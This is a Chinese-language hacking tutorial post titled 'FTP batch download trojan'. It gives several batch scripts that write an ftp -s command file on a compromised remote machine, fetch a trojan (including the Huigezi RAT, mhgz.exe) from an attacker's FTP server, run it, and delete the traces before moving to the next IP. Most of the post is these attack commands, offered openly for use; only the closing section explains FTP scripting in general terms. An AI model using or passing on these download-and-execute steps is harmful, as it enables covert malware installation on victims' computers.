FTP批处理下载木马

时间:2024-04-16 19:48:28

@echo open www.xxx.com>1.txt    "//open 226427142.vicp.net改成你的FTP空间
@echo 123>>1.txt    "//FTP空间的用户
@echo 123>>1.txt    "//FTP空间的密码
@echo get 3.exe>>1.txt    "// 要下载的木马文件名
@echo bye>>1.txt    "//退出FTP空间
@ftp -s:1.txt
@3.exe        "//运行木马
@del 1.txt    "// 删除1.txt
@exit            "//退出telnet..连接下个IP

-----------------------------------------------------------


第一步,用echo命令在对方电脑里面先新建一个文本:

echo Open ***.***.***.*** >c:\XXX.txt //***.***.***.***是ftp地址
echo XXX-XXX>>c:\XXX.txt //XXX-XXXs是用户名
echo YYY-YYY >>c:\XXX.txt //YYY-YYY 是密码
echo cd download >>c:\XXX.txt //进入文件目录,用cd命令
echo get ZZZ.exe >>c:\XXX.txt // ZZZ.exe 是文件名
echo Bye >>c:\XXX.txt

第二步
用ftp -s:c:\xxx.txt就可以下载了,或者做成bat文件运行

-----------------------------------------------------------

@echo open 127.0.0.1>down.ini ::把里面的IP改成你的ftp IP
@echo guai>>down.ini ::用户名
@echo 123456>>down.ini ::密码
@echo get 1.txt>>down.ini ::下载的木马
@echo bye>>down.ini :: 退出ftp
@ftp -s:down.ini :: 用FTP读取创建的临时文件里的ftp命令
@1.txt ::运行木马
@del down.ini ::删除临时文件
@del 1.txt ::删除木马其时这条可以不要,因为木马一般有自动删除

-----------------------------------------------------------

在远程计算机的CMD环境下,如果不能通过IPC$渠道传送文件,那就只有通过FTP下载文件了。
假设我们已经有一个FTP服务器,上面有一个我们配置好的灰鸽子木马文件mhgz.exe,我们应该知道FTP服务器的三个参数:
1、FTP服务器的IP地址:如203.75.44.34
2、FTP服务器的用户名:如tty
3、FTP服务器的密 码:如tty123
在远程计算机的CMD下依次输入下面的命令:
1、echo open 203.75.44.34>>tty.txt 登陆FTP服务器
2、echo tty>>tty.txt 用户名
3、echo tty123>>tty.txt 密码
4、echo bin>>tty.txt 开始
5、echo get mhgz.exe>>tty.txt 下载灰鸽子木马
6、echo bye>>tty.txt 关闭FTP服务器
输入上面命令后,在远程计算机上就会生成一个tty.txt文件,内容为:
open 203.75.44.34
tty
tty123
bin
get mhgz.exe
bye
现在我们在远程计算机上执行下面的命令:
ftp -s:tty.txt 意思是,读取tty.txt里的参数,执行ftp命令,命令执行完后,灰鸽子木马文件mhgz.exe就下载到对方计算机里了。

del c:\tty.txt
没有写到怎么进入目录
1、echo open 203.75.44.34>>tty.txt 登陆FTP服务器
2、echo tty>>tty.txt 用户名
3、echo tty123>>tty.txt 密码
4、echo bin>>tty.txt 开始
cd down 进入DOWN目录
5、echo get mhgz.exe>>tty.txt 下载灰鸽子木马
6、echo bye>>tty.txt 关闭FTP服务器

-----------------------------------------------------------

ftp下载文件
ftp下载文件一般步骤如下:
echo open xxx.xxx.xxx.xxx >ftp.txt
echo user   >>ftp.txt
echo password   >>ftp.txt
echo binary   >>ftp.txt   [可选]
echo get srv.exe   >>ftp.txt
echo bye   >>ftp.txt

ftp -s:ftp.txt
del ftp.txt
这样srv.exe文件就下在下来了。

ftp+自定义端口
其实ftp自定义端口非常简单,只要在ip地址后面空格,紧跟自定义的端口就可以了,如下:
echo open xxx.xxx.xxx.xxx 2121 >ftp.txt
echo user   >>ftp.txt
echo password   >>ftp.txt
echo binary   >>ftp.txt   [可选]
echo get srv.exe   >>ftp.txt
echo bye   >>ftp.txt

ftp -s:ftp.txt
del ftp.txt
这里自定义端口为2121,只要和ftp服务端的端口一致就行了。

-----------------------------------------------------------

======了解一下ftp的命令吧..
主要的有:get 下载
put 上传
bin 2进制传输数据
open 连接
...
======
问题:如何来有批处理让ftp登陆,实现命令...

试验:
bat.bat
-----------
ftp dd.dd.com //假设地址
UserName
PassWord
命令...
bye
exit
-----------
如果这样的话显然不行..运行到连接dd.dd.com之后就要手动输入了...麻烦-_-!
ftp 命令里面的参数有个-s的,作用是在执行ftp时读取一个文件....
具体的是这样的:ftp -s:dd.dd
其中dd.dd是一个文件名称...
哈哈..这样的话就ok了....
我们只要在dd.dd这个文件里面输入ftp的命令不就ok了吗?
好,我们马上来make
dd.dd
============================
open dd.dd.com
user
用户名
密码
命令...
....
bye
exit
============================
OK这样DD.DD的文件就写好了..
我们可以手动的输入:ftp -s:dd.dd
想到这里..麻烦来了..还是要手动的..(象个半自动程序0_0!)
等等..我们还是可以在建立一个.bet file
dd.bat
============================
ftp -s:dd.dd
============================
注意dd.dd 和dd.bat 要在一个目录下面才可以的..!

最后在提醒几点...如果程序运行成功..可是没有达到预期目的..

比如要在public_html/mm/ 目录下面下载mm.exe文件

可以却没有成功...下载下来的mm.exe文件是0 btyes

那你要看看是否你cd 的目录名称正确...关于一些细节..都会导致下载文件的失败...
====---------------------------
总结:
今天我们学会了简单的利用批处理的方法实现的ftp下自动连接,登陆,执行命令的方法...
大家可以适当的去扩展一下....